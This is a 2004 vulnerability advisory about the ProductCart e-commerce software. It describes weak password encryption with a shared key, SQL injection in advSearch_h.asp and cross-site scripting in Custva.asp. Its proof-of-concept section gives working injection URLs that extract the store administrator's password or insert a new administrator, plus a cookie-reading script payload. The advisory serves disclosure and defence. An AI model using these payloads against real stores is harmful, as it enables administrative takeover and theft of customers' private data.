Adv-20040216.txt

` S-Quadra Advisory #2004-02-16  
  
Topic: EarlyImpact ProductCart shopping cart software multiple security  
vulnerabilities  
Severity: High  
Vendor URL: http://www.earlyimpact.com  
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040216.txt  
Release date: 16 Feb 2004  
  
1. DESCRIPTION  
  
ProductCart is a shopping cart application for e-commerce enabled  
sites. Its written on ASP, works on most Windows platforms and uses MS  
Access or MS SQL Server as a backend. Please visit  
http://www.earlyimpact.com for information about ProductCart shopping cart.  
  
2. DETAILS  
  
-- Vulnerability 1: Incorrect use of cryptography  
  
ProductCart software uses stream cipher algorithm (possibly RC4) to  
encrypt various passwords before storing them in a database. A stream  
cipher generates a keystream (a sequence of bits used as a key).  
Encryption is accomplished by combining the keystream with the plaintext  
with the bitwise XOR operation. The generation of the keystream is  
independent of the plaintext and ciphertext. In ProductCart the single  
cryptographic key used to encrypt all customers and store administrator  
passwords so it's possible for an attacker to perform a choosen  
plaintext attack and obtain first 100 bytes of keystream (maximum length  
of customer password). Using this bytes an attacker can decrypt any  
encrypted information from the database including store administrator  
password.  
  
-- Vulnerability 2: SQL Injection vulnerability  
  
An SQL Injection vulnerability has been found in the 'advSearch_h.asp'  
script.  
  
Inproper use of user supplied input filters allows an attacker to  
modify SQL query and perform some kinds of SQL injection attacks.  
  
Successfull exploitation of this vulnerability could allow an attacker  
to gain administrative access to ProductCart store and read any  
information from store database (i.e. customers private data). Also an  
attacker could execute arbitrary commands using xp_cmdshell function.  
  
-- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'  
  
By injecting specially crafted javascript code in url and tricking a  
user to visit it a remote attacker can steal user session id and gain  
access to user's personal data.  
  
-- PoC code  
  
--Vulnerability 1 and 2:  
  
Platform: MS SQL Server as a backend  
ProductCart software incorrect uses cryptographic algorithms to protect  
store administrator password. Combination of this error and SQL  
injection vulnerability allow an attacker to gain administrative access  
to store.  
  
Performing following scenarion an attaker can find the store  
administrator username and password.  
  
Scenario:  
  
1. An attacker register new customer in store. Let the value of field  
'Postal Code' in the registration form will be equal to '987654' and an  
attacker must select long password (it should be longer then the store  
administrator password).  
  
2. An attacker performs the following request  
  
http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&   
  
  
  
3. An attacker goes to http://[target]/productcart/pc/Custmoda.asp  
and reads his personal information. The value of the "FirstName" field  
in this form will be store administrator login name. Store administrator  
password is easy to find by this formula:  
  
adminpass = (Last Name) xor (Phone) xor (customer login password from  
scenario step 1)  
  
In the following scenario an attacker can add a new administrator to store  
  
Scenario:  
  
1. An attacker register new customer in store. Let the value of 'First  
Name' field in registration form will be equal to  
'1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name ' field will be equal  
to '34567', the value of 'Password' field will be equal to '111' and the  
value of 'Postal Code' field will be equal to '987654'.  
  
2. An attacker performs the following request:  
  
http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&   
  
  
  
3. An attacker logs into the store admin interface with username  
'34567' and password '111'.  
  
-- Vulnerability 3:  
  
http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"   
  
  
  
3. FIX INFORMATION  
  
S-Quadra alerted EarlyImpact development team to this issue on 29th  
January 2004.  
  
4. CREDITS  
  
Nick Gudov <[email protected]> is responsible for discovering this  
issue.  
  
5. ABOUT  
  
S-Quadra offers services in computer security, penetration testing and  
network assesment, web application security, source code review and  
third party product vulnerability assesment, forensic support and  
reverse engineering.  
  
S-Quadra Advisory #2004-02-16  
`